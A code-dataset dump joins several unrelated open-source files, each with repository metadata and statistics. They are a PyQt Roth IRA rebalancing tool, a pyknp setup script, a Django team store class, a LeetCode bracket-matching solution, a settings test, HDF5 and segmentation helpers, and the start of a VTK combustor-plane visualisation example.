] | null | null | null |
AssetAllocation.py
|
MomsLasanga/AssetAllocation
|
3729da4f73402d9162c444636002a964f26e40eb
|
[
"CC0-1.0"
] | null | null | null |
"""
Asset Allocation
By Patrick Murrell
Created 6/17/2020
This program that takes a csv positions file from fidelity.com from a Roth IRA account that contains the
investments of SPAXX, FXNAX, FZILX, and FZROX. Since SPAXX is a Money Market fund then it is assumed that the money in
here is not meant to be calculated in the total asset allocation of the account.
Once the csv file is entered its data is scraped using the csv python library and the data used in calculations and
tables that display useful statistics to the user. The user then should enter the amount they want to invest, and then
click the "Calculate Investment Strategy" button to generate a table of values and display the recommended investment
strategy on three buttons. These three buttons tell us whether to buy or sell or hold a dollar amount of each
fund. Clicking these buttons copy their number values to the clip board to make the buying and selling of stocks easier
This is a program written ideally for a single user (my investment strategy), but anyone can use the code in order to
build their own version if they want.
"""
import csv # for the scraping of the csv file
import re # for making sure we just copy the buttons numbers
from PyQt5.QtWidgets import QFileDialog # to use the file browser in order to select a fidelity issued csv file
from PyQt5 import QtCore, QtWidgets, QtGui # to build the applications GUI
import sys # for starting and exiting the application
# noinspection PyBroadException
class UiMainWindow(object):
# decides whether or not we buy/sell/hold the current allocation of a fund
def buy_or_sell(self, percentage, total, current, money_to_invest, key):
s: str # the string we print onto the buttons
target = total * percentage # our ideal dollar amount invested in the fund
actual_vs_target_ratio = target / current # the ratio of the ideal target allocation and the current allocation
# if the fund is 5% outside of its target allocation and we are putting in/taking out new money then we
# adjust the fund
if .95 < actual_vs_target_ratio < 1.05 and int(money_to_invest) == 0:
s = "Looks good for "
else: # buy or sell the exact amount of the fund so we hit the target allocation
amount_to_trade = str(round(abs(current - target), 2))
if actual_vs_target_ratio > 1.0:
s = "Buy "
else:
s = "Sell "
s += "$" + amount_to_trade + " "
self.target_value.append(str(round(target, 2))) # so we can display the target value in the info table
s += self.info_table[1][key] # add the name of the investment to the string
return s # return the text to add to the button
# uses pandas to read from a csv file and add the current balances of investments to list
def scrape_values_from_csv(self):
temp_names = [] # temporarily stores labels of funds
temp_balances = [] # temporarily stores current balances of funds
csv_list = [] # list that stores the contents of the csv file
self.current_balances.clear() # clear the list of balances so we can replace them with the current csv values
try: # import the list from Fidelity using pandas
with open(self.filename, 'r') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader: # read the csv file contents into a list
csv_list.append(row)
except: # if this doesn't work we just notify the user by returning a list of -1 (a flag of sorts)
self.current_balances = [-1] # we check this to report that they did not enter a correct csv file
else:
# reset the info table list and set its values to the headings
self.info_table = [['Symbol', 'Current Value', 'Current Allocation', 'Target value', 'Target Allocation']]
for i in range(2, 5): # read through the csv list
temp_balances.append(csv_list[i][6]) # access the current values
self.current_balances.append(float(temp_balances[i - 2].replace('$', ''))) # remove the '$' sign
temp_names.append(csv_list[i][1]) # add the name of the fund to label names
self.info_table.append(temp_names) # add the names and balances lists to the
self.info_table.append(temp_balances) # info table list
# takes values from csv list, money we want to invest, and
def calculate_strategy(self, money_to_invest):
# Fixed Asset Allocation Percentages based on age/year of user (mine is set to every 20XX year, because I was
# born in 1999)
if "2020" in self.filename:
bond_percentage = .2
international_index_percentage = .3
national_index_percentage = .5
elif "2030" in self.filename:
bond_percentage = .3
international_index_percentage = .27
national_index_percentage = .43
elif "2040" in self.filename:
bond_percentage = .4
international_index_percentage = .23
national_index_percentage = .37
elif "2050" in self.filename:
bond_percentage = .5
international_index_percentage = .19
national_index_percentage = .31
elif "2060" in self.filename:
bond_percentage = .6
international_index_percentage = .15
national_index_percentage = .25
elif "2070" in self.filename:
bond_percentage = .7
international_index_percentage = .11
national_index_percentage = .19
elif "2080" in self.filename:
bond_percentage = .8
international_index_percentage = .08
national_index_percentage = .12
elif "2090" in self.filename:
bond_percentage = .9
international_index_percentage = .04
national_index_percentage = .06
else:
bond_percentage = 1.0
international_index_percentage = 0.0
national_index_percentage = 0.0
total_amount = money_to_invest + sum(self.current_balances) # total current amount of money to be invested
self.target_value.clear() # clear the target values list
# updates the buttons to display the recommended asset allocation to the user
self.bonds_button.setText(self._translate("main_window", self.buy_or_sell( # set bonds button text
bond_percentage, total_amount, self.current_balances[0], money_to_invest, 0)))
self.international_button.setText(self._translate("main_window", self.buy_or_sell( # set international button
international_index_percentage, total_amount, self.current_balances[1], money_to_invest, 1)))
self.national_button.setText(self._translate("main_window", self.buy_or_sell( # set national button text
national_index_percentage, total_amount, self.current_balances[2], money_to_invest, 2)))
# add current allocation, ideal fund balances, and ideal allocation of account to info table list
self.info_table.append([str(round(100 * self.current_balances[0] / (total_amount - money_to_invest), 2)) + "%",
str(round(100 * self.current_balances[1] / (total_amount - money_to_invest), 2)) + "%",
str(round(100 * self.current_balances[2] / (total_amount - money_to_invest), 2)) + "%"])
self.info_table.append(self.target_value)
self.info_table.append([str(100 * bond_percentage) + "%", str(100 * international_index_percentage) + "%",
str(100 * national_index_percentage) + "%"])
# this method sets up the ui as well as a couple of variables used accross the program
def __init__(self, main_win):
button_stylesheet = "background-color: #3F3F3F; color: #ffffff" # style sheet
self.info_table = [] # table of investment information and positions we print out to the user
self.current_balances = [-1] # current balances tracks the list of fund balances pulled from the csv file
self.numbers = re.compile(r'\d+(?:\.\d+)?') # regular expression that is used to copy the button text numbers
self.target_value = [] # stores the ideal balance values for each fund
self.filename = '' # name path of csv file is stored here
self._translate = QtCore.QCoreApplication.translate # shortened function name for ease of use
# UI related code generated by PyQt file
main_win.setObjectName("main_window")
main_win.resize(780, 350)
main_win.setAutoFillBackground(True)
main_win.setStyleSheet("background-color: #4a4a4a; color: #ffffff; font: 10pt 'Consolas'")
self.central_widget = QtWidgets.QWidget(main_win)
self.central_widget.setAutoFillBackground(True)
self.central_widget.setObjectName("central_widget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.central_widget)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.main_vlayout = QtWidgets.QVBoxLayout()
self.main_vlayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint)
self.main_vlayout.setContentsMargins(5, 5, 5, 5)
self.main_vlayout.setSpacing(5)
self.main_vlayout.setObjectName("main_vlayout")
self.entry_hlayout = QtWidgets.QHBoxLayout()
self.entry_hlayout.setContentsMargins(5, 5, 5, 5)
self.entry_hlayout.setSpacing(5)
self.entry_hlayout.setObjectName("entry_hlayout")
self.entry_label = QtWidgets.QLabel(self.central_widget)
self.entry_label.setObjectName("entry_label")
self.entry_hlayout.addWidget(self.entry_label)
self.entry_lineEdit = QtWidgets.QLineEdit(self.central_widget)
self.entry_lineEdit.setObjectName("entry_lineEdit")
self.entry_hlayout.addWidget(self.entry_lineEdit)
spacer_item = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.entry_hlayout.addItem(spacer_item)
self.main_vlayout.addLayout(self.entry_hlayout)
self.two_button_horizontal = QtWidgets.QHBoxLayout()
self.two_button_horizontal.setContentsMargins(5, 5, 5, 5)
self.two_button_horizontal.setSpacing(5)
self.two_button_horizontal.setObjectName("two_button_horizontal")
self.csv_button = QtWidgets.QPushButton(self.central_widget)
self.csv_button.setObjectName("csv_button")
self.csv_button.setStyleSheet(button_stylesheet)
self.csv_button.clicked.connect(self.open_csv) # when csv button is clicked run the open csv method
self.two_button_horizontal.addWidget(self.csv_button)
self.calculate_button = QtWidgets.QPushButton(self.central_widget)
self.calculate_button.setStyleSheet(button_stylesheet)
self.calculate_button.setObjectName("calculate_button")
self.calculate_button.clicked.connect(self.calculate) # when the calculate button is clicked run calculate()
self.two_button_horizontal.addWidget(self.calculate_button)
self.main_vlayout.addLayout(self.two_button_horizontal)
self.error_vlayout = QtWidgets.QVBoxLayout()
self.error_vlayout.setContentsMargins(5, 5, 5, 5)
self.error_vlayout.setSpacing(5)
self.error_vlayout.setObjectName("error_vlayout")
self.error_label = QtWidgets.QLabel(self.central_widget)
self.error_label.setLayoutDirection(QtCore.Qt.LeftToRight)
self.error_label.setFrameShape(QtWidgets.QFrame.NoFrame)
self.error_label.setFrameShadow(QtWidgets.QFrame.Plain)
self.error_label.setAlignment(QtCore.Qt.AlignCenter)
self.error_label.setObjectName("error_label")
self.info_label = QtWidgets.QLabel(self.central_widget)
self.info_label.setLayoutDirection(QtCore.Qt.LeftToRight)
self.info_label.setFrameShape(QtWidgets.QFrame.NoFrame)
self.info_label.setFrameShadow(QtWidgets.QFrame.Plain)
self.info_label.setAlignment(QtCore.Qt.AlignCenter)
self.info_label.setObjectName("error_label")
self.error_vlayout.addWidget(self.info_label)
self.error_vlayout.addWidget(self.error_label)
self.main_vlayout.addLayout(self.error_vlayout)
self.three_button_horizontal = QtWidgets.QHBoxLayout()
self.three_button_horizontal.setContentsMargins(5, 5, 5, 5)
self.three_button_horizontal.setSpacing(5)
self.three_button_horizontal.setObjectName("three_button_horizontal")
self.bonds_button = QtWidgets.QPushButton(self.central_widget)
self.bonds_button.setObjectName("bonds_button")
self.bonds_button.setStyleSheet(button_stylesheet)
self.bonds_button.clicked.connect(self.copy_bond_number)
self.three_button_horizontal.addWidget(self.bonds_button)
self.international_button = QtWidgets.QPushButton(self.central_widget)
self.international_button.setObjectName("international_button")
self.international_button.setStyleSheet(button_stylesheet)
self.international_button.clicked.connect(self.copy_international_number)
self.three_button_horizontal.addWidget(self.international_button)
self.national_button = QtWidgets.QPushButton(self.central_widget)
self.national_button.setObjectName("national_button")
self.national_button.setStyleSheet(button_stylesheet)
self.national_button.clicked.connect(self.copy_national_number)
self.three_button_horizontal.addWidget(self.national_button)
self.main_vlayout.addLayout(self.three_button_horizontal)
self.verticalLayout_2.addLayout(self.main_vlayout)
main_win.setCentralWidget(self.central_widget)
self.menubar = QtWidgets.QMenuBar(main_win)
self.menubar.setGeometry(QtCore.QRect(0, 0, 884, 21))
self.menubar.setObjectName("menubar")
main_win.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(main_win)
self.statusbar.setObjectName("statusbar")
main_win.setStatusBar(self.statusbar)
self.reanimate_ui(main_win)
QtCore.QMetaObject.connectSlotsByName(main_win)
# Ui function that sets initial ui text
def reanimate_ui(self, main_w):
main_w.setWindowTitle(self._translate("main_window", "Asset Allocation"))
self.entry_label.setText(self._translate("main_window", "The amount you want to invest:"))
self.csv_button.setText(self._translate("main_window", "Browse For CSV"))
self.calculate_button.setText(self._translate("main_window", "Calculate Investment Strategy"))
self.error_label.setText(self._translate("main_window", ""))
self.info_label.setText(self._translate("main_window", ""))
self.bonds_button.setText(self._translate("main_window", ""))
self.international_button.setText(self._translate("main_window", ""))
self.national_button.setText(self._translate("main_window", ""))
# creates a file explorer dialog to select csv. checks and reports if a valid csv was selected
def open_csv(self):
# open and select file from csv button
filename_list = list(QFileDialog.getOpenFileName(main_window, 'Open file', "/", "csv files (*.csv)"))
self.filename = str(filename_list[0])
self.scrape_values_from_csv()
if self.current_balances == [-1]: # if a csv file is not detected
self.csv_file_error() # report an error to the user
else:
self.error_label.setText(self._translate("main_window", self.filename)) # show the file name to the user
# check to make sure the user entered either a number or nothing, also entered a csv, then run calculate_strategy()
def calculate(self):
try:
amount_to_invest = float(self.entry_lineEdit.text()) # check to see if the user entered a proper number
except:
if self.entry_lineEdit.text() == '': # if the user enters nothing assume they are investing $0.00
amount_to_invest = 0.00
else: # since the user did not enter a number throw an error and exit the function
self.error_label.setText(self._translate("main_window", "You did not enter a valid amount"))
return
if self.current_balances != [-1]: # if the user entered a valid csv
self.calculate_strategy(amount_to_invest) # calculate our strategy and fill the rest of the info table list
self.error_label.setText(self._translate("main_window", "Strategy Calculated"))
# print our info table list onto the screen in the form of a table
s = 'Values From CSV: \n\n|' # create the info table in a string called s
for i in range(len(self.info_table[0])):
s += "{:20}|".format((str(self.info_table[0][i]).ljust(15)))
s += "\n" + "-" * int((len(s) * .85))
for i in range(len(self.info_table[1])):
s += "\n|"
for j in range(1, len(self.info_table)):
s += "{:20}|".format((str(self.info_table[j][i]).ljust(15)))
s += '\n'
self.info_label.setText(self._translate("main_window", s)) # set the info label to the info table
for i in range(3): # remove last three values of info table list so they do not overlap with themselves
self.info_table.remove(self.info_table[len(self.info_table) - 1])
else:
self.csv_file_error() # report an error to the user
# methods that copy the text of how much to buy/sell/hold from button onto clipboard
def copy_bond_number(self):
cb.setText(''.join(self.numbers.findall(self.bonds_button.text())), mode=cb.Clipboard)
def copy_national_number(self):
cb.setText(''.join(self.numbers.findall(self.national_button.text())), mode=cb.Clipboard)
def copy_international_number(self):
cb.setText(''.join(self.numbers.findall(self.international_button.text())), mode=cb.Clipboard)
# report an error if a csv file is not detected (when self.current_values == [-1])
def csv_file_error(self):
self.error_label.setText(self._translate("main_window", "you did not enter a csv file"))
# main function that starts and closes the app
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
main_window = QtWidgets.QMainWindow()
cb = QtWidgets.QApplication.clipboard()
cb.clear(mode=cb.Clipboard)
ui = UiMainWindow(main_window)
main_window.show()
sys.exit(app.exec_())
| 60.536508
| 121
| 0.679637
| 2,468
| 19,069
| 5.079822
| 0.184765
| 0.017947
| 0.023052
| 0.031188
| 0.320491
| 0.228683
| 0.155141
| 0.090851
| 0.065327
| 0.036691
| 0
| 0.015168
| 0.235933
| 19,069
| 314
| 122
| 60.729299
| 0.845299
| 0.254182
| 0
| 0.059289
| 0
| 0
| 0.068123
| 0.003182
| 0.003953
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.019763
| 0
| 0.075099
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31fb8c91aed632440a47a6131c0345c5540769ba
| 919
|
py
|
Python
|
setup.py
|
matsurih/pyknp
|
e4d0756868676a0c2058dbc0d8dfa77102fe0ba4
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
matsurih/pyknp
|
e4d0756868676a0c2058dbc0d8dfa77102fe0ba4
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
matsurih/pyknp
|
e4d0756868676a0c2058dbc0d8dfa77102fe0ba4
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
__author__ = 'Kurohashi-Kawahara Lab, Kyoto Univ.'
__email__ = 'contact@nlp.ist.i.kyoto-u.ac.jp'
__copyright__ = ''
__license__ = 'See COPYING'
import os
from setuptools import setup, find_packages
about = {}
here = os.path.abspath(os.path.dirname(__file__))
exec(open(os.path.join(here, 'pyknp', '__version__.py')).read(), about)
with open('README.md', encoding='utf8') as f:
long_description = f.read()
setup(
name='pyknp',
version=about['__version__'],
maintainer=__author__,
maintainer_email=__email__,
author=__author__,
author_email=__email__,
description='Python module for JUMAN/KNP.',
license=__license__,
url='https://github.com/ku-nlp/pyknp',
long_description=long_description,
long_description_content_type='text/markdown',
scripts=['pyknp/scripts/knp-drawtree', ],
packages=find_packages(),
install_requires=['six'],
)
| 27.029412
| 71
| 0.709467
| 115
| 919
| 5.156522
| 0.617391
| 0.10118
| 0.064081
| 0.10118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001264
| 0.139282
| 919
| 33
| 72
| 27.848485
| 0.74842
| 0.021763
| 0
| 0
| 0
| 0
| 0.25167
| 0.063474
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.074074
| 0
| 0.074074
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31fbbf24a86c0801f6f0f2045710204934802521
| 1,729
|
py
|
Python
|
src/api/store/export.py
|
gregory-chekler/api
|
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
|
[
"MIT"
] | null | null | null |
src/api/store/export.py
|
gregory-chekler/api
|
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
|
[
"MIT"
] | null | null | null |
src/api/store/export.py
|
gregory-chekler/api
|
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
|
[
"MIT"
] | null | null | null |
from database.models import Team, UserProfile
from _main_.utils.massenergize_errors import MassEnergizeAPIError, InvalidResourceError, ServerError, CustomMassenergizeError
from _main_.utils.massenergize_response import MassenergizeResponse
from _main_.utils.context import Context
class TeamStore:
def __init__(self):
self.name = "Team Store/DB"
def get_team_info(self, team_id) -> (dict, MassEnergizeAPIError):
team = Team.objects.filter(id=team_id)
if not team:
return None, InvalidResourceError()
return team, None
def list_teams(self, community_id) -> (list, MassEnergizeAPIError):
teams = Team.objects.filter(community__id=community_id)
if not teams:
return [], None
return teams, None
def create_team(self, args) -> (dict, MassEnergizeAPIError):
try:
new_team = Team.create(**args)
new_team.save()
return new_team, None
except Exception:
return None, ServerError()
def update_team(self, team_id, args) -> (dict, MassEnergizeAPIError):
team = Team.objects.filter(id=team_id)
if not team:
return None, InvalidResourceError()
team.update(**args)
return team, None
def delete_team(self, team_id) -> (dict, MassEnergizeAPIError):
teams = Team.objects.filter(id=team_id)
if not teams:
return None, InvalidResourceError()
def list_teams_for_community_admin(self, community_id) -> (list, MassEnergizeAPIError):
teams = Team.objects.filter(community__id = community_id)
return teams, None
def list_teams_for_super_admin(self):
try:
teams = Team.objects.all()
return teams, None
except Exception as e:
print(e)
return None, CustomMassenergizeError(str(e))
| 29.810345
| 125
| 0.717178
| 210
| 1,729
| 5.7
| 0.261905
| 0.030075
| 0.071011
| 0.047619
| 0.387636
| 0.3467
| 0.31746
| 0.31746
| 0.292398
| 0.292398
| 0
| 0
| 0.188548
| 1,729
| 58
| 126
| 29.810345
| 0.853172
| 0
| 0
| 0.409091
| 0
| 0
| 0.007514
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.090909
| 0
| 0.568182
| 0.022727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31fbec348a03e3f7b7667b0fb7f3d122e939f326
| 1,125
|
py
|
Python
|
valid_parentheses.py
|
fossilet/leetcode
|
4cf787c74fc339dc6aee6a0b633ca15b38ac18a1
|
[
"MIT"
] | 5
|
2015-12-10T14:19:02.000Z
|
2021-07-02T01:23:34.000Z
|
valid_parentheses.py
|
fossilet/leetcode
|
4cf787c74fc339dc6aee6a0b633ca15b38ac18a1
|
[
"MIT"
] | null | null | null |
valid_parentheses.py
|
fossilet/leetcode
|
4cf787c74fc339dc6aee6a0b633ca15b38ac18a1
|
[
"MIT"
] | 1
|
2015-10-01T01:43:14.000Z
|
2015-10-01T01:43:14.000Z
|
"""
https://oj.leetcode.com/problems/valid-parentheses/
Given a string containing just the characters '(', ')', '{', '}', '[' and ']', determine if the input string is valid.
The brackets must close in the correct order, "()" and "()[]{}" are all valid but "(]" and "([)]" are not.
"""
class Solution:
# @return a boolean
def isValid(self, s):
stack = []
for x in s:
if x in '({[':
stack.append(x)
else:
try:
y = stack.pop()
except IndexError:
return False
if not ((x == '(' and y == ')') or (x == '[' and y == ']') or (x == '{' and y == '}') or
(y == '(' and x == ')') or (y == '[' and x == ']') or (y == '{' and x == '}')):
return False
return stack == []
if __name__ == '__main__':
s = Solution()
assert s.isValid('()')
assert s.isValid('[]')
assert not s.isValid('[')
assert not s.isValid('}')
assert not s.isValid('([')
assert s.isValid('([]{})[]')
assert not s.isValid('([)]')
| 30.405405
| 118
| 0.441778
| 126
| 1,125
| 3.880952
| 0.412698
| 0.114519
| 0.171779
| 0.139059
| 0.294479
| 0.294479
| 0.294479
| 0.294479
| 0.212679
| 0.132924
| 0
| 0
| 0.352
| 1,125
| 36
| 119
| 31.25
| 0.670782
| 0.264889
| 0
| 0.083333
| 0
| 0
| 0.052503
| 0
| 0
| 0
| 0
| 0
| 0.291667
| 1
| 0.041667
| false
| 0
| 0
| 0
| 0.208333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31ffd8fdd3242dbfb70cd647f01afb511ece19be
| 315
|
py
|
Python
|
settings/tests/test_global_settings.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | 3
|
2020-05-05T12:12:09.000Z
|
2020-05-08T08:48:16.000Z
|
settings/tests/test_global_settings.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | 160
|
2020-05-19T13:03:43.000Z
|
2022-03-12T00:35:28.000Z
|
settings/tests/test_global_settings.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | null | null | null |
import pytest
from model_bakery import baker
pytestmark = pytest.mark.django_db
def test_get_global_settings(client_anonymous):
settings = baker.make_recipe("settings.global_setting")
response = client_anonymous.get("/global_settings")
assert response.json() == {"productVat": settings.product_vat}
| 26.25
| 66
| 0.780952
| 39
| 315
| 6.025641
| 0.666667
| 0.076596
| 0.144681
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120635
| 315
| 11
| 67
| 28.636364
| 0.848375
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 0.073016
| 0
| 0
| 0
| 0
| 0.142857
| 1
| 0.142857
| false
| 0
| 0.285714
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee02c3e71989e00196fcabde81e3802364cd921e
| 3,679
|
py
|
Python
|
em_net/util/misc.py
|
weihuang527/superhuman_network
|
a89820bda4d0006198bac3bb5922a958ac87f2ae
|
[
"MIT"
] | null | null | null |
em_net/util/misc.py
|
weihuang527/superhuman_network
|
a89820bda4d0006198bac3bb5922a958ac87f2ae
|
[
"MIT"
] | null | null | null |
em_net/util/misc.py
|
weihuang527/superhuman_network
|
a89820bda4d0006198bac3bb5922a958ac87f2ae
|
[
"MIT"
] | null | null | null |
import sys
import numpy as np
import h5py
import random
import os
from subprocess import check_output
# 1. h5 i/o
def readh5(filename, datasetname):
data=np.array(h5py.File(filename,'r')[datasetname])
return data
def writeh5(filename, datasetname, dtarray):
# reduce redundant
fid=h5py.File(filename,'w')
ds = fid.create_dataset(datasetname, dtarray.shape, compression="gzip", dtype=dtarray.dtype)
ds[:] = dtarray
fid.close()
def readh5k(filename, datasetname):
fid=h5py.File(filename)
data={}
for kk in datasetname:
data[kk]=array(fid[kk])
fid.close()
return data
def writeh5k(filename, datasetname, dtarray):
fid=h5py.File(filename,'w')
for kk in datasetname:
ds = fid.create_dataset(kk, dtarray[kk].shape, compression="gzip", dtype=dtarray[kk].dtype)
ds[:] = dtarray[kk]
fid.close()
def resizeh5(path_in, path_out, dataset, ratio=(0.5,0.5), interp=2, offset=[0,0,0]):
from scipy.ndimage.interpolation import zoom
# for half-res
im = h5py.File( path_in, 'r')[ dataset ][:]
shape = im.shape
if len(shape)==3:
im_out = np.zeros((shape[0]-2*offset[0], int(np.ceil(shape[1]*ratio[0])), int(np.ceil(shape[2]*ratio[1]))), dtype=im.dtype)
for i in xrange(shape[0]-2*offset[0]):
im_out[i,...] = zoom( im[i+offset[0],...], zoom=ratio, order=interp)
if offset[1]!=0:
im_out=im_out[:,offset[1]:-offset[1],offset[2]:-offset[2]]
elif len(shape)==4:
im_out = np.zeros((shape[0]-2*offset[0], shape[1], int(shape[2]*ratio[0]), int(shape[3]*ratio[1])), dtype=im.dtype)
for i in xrange(shape[0]-2*offset[0]):
for j in xrange(shape[1]):
im_out[i,j,...] = zoom( im[i+offset[0],j,...], ratio, order=interp)
if offset[1]!=0:
im_out=im_out[:,offset[1]:-offset[1],offset[2]:-offset[2],offset[3]:-offset[3]]
if path_out is None:
return im_out
writeh5(path_out, dataset, im_out)
def writetxt(filename, dtarray):
a = open(filename,'w')
a.write(dtarray)
a.close()
# 2. segmentation wrapper
def segToAffinity(seg):
from ..lib import malis_core as malisL
nhood = malisL.mknhood3d()
return malisL.seg_to_affgraph(seg,nhood)
def bwlabel(mat):
ran = [int(mat.min()),int(mat.max())];
out = np.zeros(ran[1]-ran[0]+1);
for i in range(ran[0],ran[1]+1):
out[i] = np.count_nonzero(mat==i)
return out
def genSegMalis(gg3,iter_num): # given input seg map, widen the seg border
from scipy.ndimage import morphology as skmorph
#from skimage import morphology as skmorph
gg3_dz = np.zeros(gg3.shape).astype(np.uint32)
gg3_dz[1:,:,:] = (np.diff(gg3,axis=0))
gg3_dy = np.zeros(gg3.shape).astype(np.uint32)
gg3_dy[:,1:,:] = (np.diff(gg3,axis=1))
gg3_dx = np.zeros(gg3.shape).astype(np.uint32)
gg3_dx[:,:,1:] = (np.diff(gg3,axis=2))
gg3g = ((gg3_dx+gg3_dy)>0)
#stel=np.array([[1, 1],[1,1]]).astype(bool)
#stel=np.array([[0, 1, 0],[1,1,1], [0,1,0]]).astype(bool)
stel=np.array([[1, 1, 1],[1,1,1], [1,1,1]]).astype(bool)
#stel=np.array([[1,1,1,1],[1, 1, 1, 1],[1,1,1,1],[1,1,1,1]]).astype(bool)
gg3gd=np.zeros(gg3g.shape)
for i in range(gg3g.shape[0]):
gg3gd[i,:,:]=skmorph.binary_dilation(gg3g[i,:,:],structure=stel,iterations=iter_num)
out = gg3.copy()
out[gg3gd==1]=0
#out[0,:,:]=0 # for malis
return out
# 3. evaluation
"""
def runBash(cmd):
fn = '/tmp/tmp_'+str(random.random())[2:]+'.sh'
print('tmp bash file:',fn)
writetxt(fn, cmd)
os.chmod(fn, 0755)
out = check_output([fn])
os.remove(fn)
print(out)
"""
| 33.144144
| 131
| 0.611579
| 597
| 3,679
| 3.710218
| 0.231156
| 0.026185
| 0.032506
| 0.036117
| 0.306998
| 0.21535
| 0.21535
| 0.210384
| 0.167043
| 0.13228
| 0
| 0.052189
| 0.192715
| 3,679
| 110
| 132
| 33.445455
| 0.693603
| 0.097037
| 0
| 0.194805
| 0
| 0
| 0.004202
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116883
| false
| 0
| 0.116883
| 0
| 0.311688
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee02e152f754c131475d2144d7eda38e3e662a80
| 3,277
|
py
|
Python
|
Examples/VisualizationAlgorithms/Python/warpComb.py
|
satya-arjunan/vtk8
|
ee7ced57de6d382a2d12693c01e2fcdac350b25f
|
[
"BSD-3-Clause"
] | 3
|
2015-07-28T18:07:50.000Z
|
2018-02-28T20:59:58.000Z
|
Examples/VisualizationAlgorithms/Python/warpComb.py
|
satya-arjunan/vtk8
|
ee7ced57de6d382a2d12693c01e2fcdac350b25f
|
[
"BSD-3-Clause"
] | 14
|
2015-04-25T17:54:13.000Z
|
2017-01-13T15:30:39.000Z
|
Examples/VisualizationAlgorithms/Python/warpComb.py
|
satya-arjunan/vtk8
|
ee7ced57de6d382a2d12693c01e2fcdac350b25f
|
[
"BSD-3-Clause"
] | 5
|
2020-10-02T10:14:35.000Z
|
2022-03-10T07:50:22.000Z
|
#!/usr/bin/env python
# This example demonstrates how to extract "computational planes" from
# a structured dataset. Structured data has a natural, logical
# coordinate system based on i-j-k indices. Specifying imin,imax,
# jmin,jmax, kmin,kmax pairs can indicate a point, line, plane, or
# volume of data.
#
# In this example, we extract three planes and warp them using scalar
# values in the direction of the local normal at each point. This
# gives a sort of "velocity profile" that indicates the nature of the
# flow.
import vtk
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Here we read data from a annular combustor. A combustor burns fuel
# and air in a gas turbine (e.g., a jet engine) and the hot gas
# eventually makes its way to the turbine section.
pl3d = vtk.vtkMultiBlockPLOT3DReader()
pl3d.SetXYZFileName(VTK_DATA_ROOT + "/Data/combxyz.bin")
pl3d.SetQFileName(VTK_DATA_ROOT + "/Data/combq.bin")
pl3d.SetScalarFunctionNumber(100)
pl3d.SetVectorFunctionNumber(202)
pl3d.Update()
pl3d_output = pl3d.GetOutput().GetBlock(0)
# Planes are specified using a imin,imax, jmin,jmax, kmin,kmax
# coordinate specification. Min and max i,j,k values are clamped to 0
# and maximum value.
plane = vtk.vtkStructuredGridGeometryFilter()
plane.SetInputData(pl3d_output)
plane.SetExtent(10, 10, 1, 100, 1, 100)
plane2 = vtk.vtkStructuredGridGeometryFilter()
plane2.SetInputData(pl3d_output)
plane2.SetExtent(30, 30, 1, 100, 1, 100)
plane3 = vtk.vtkStructuredGridGeometryFilter()
plane3.SetInputData(pl3d_output)
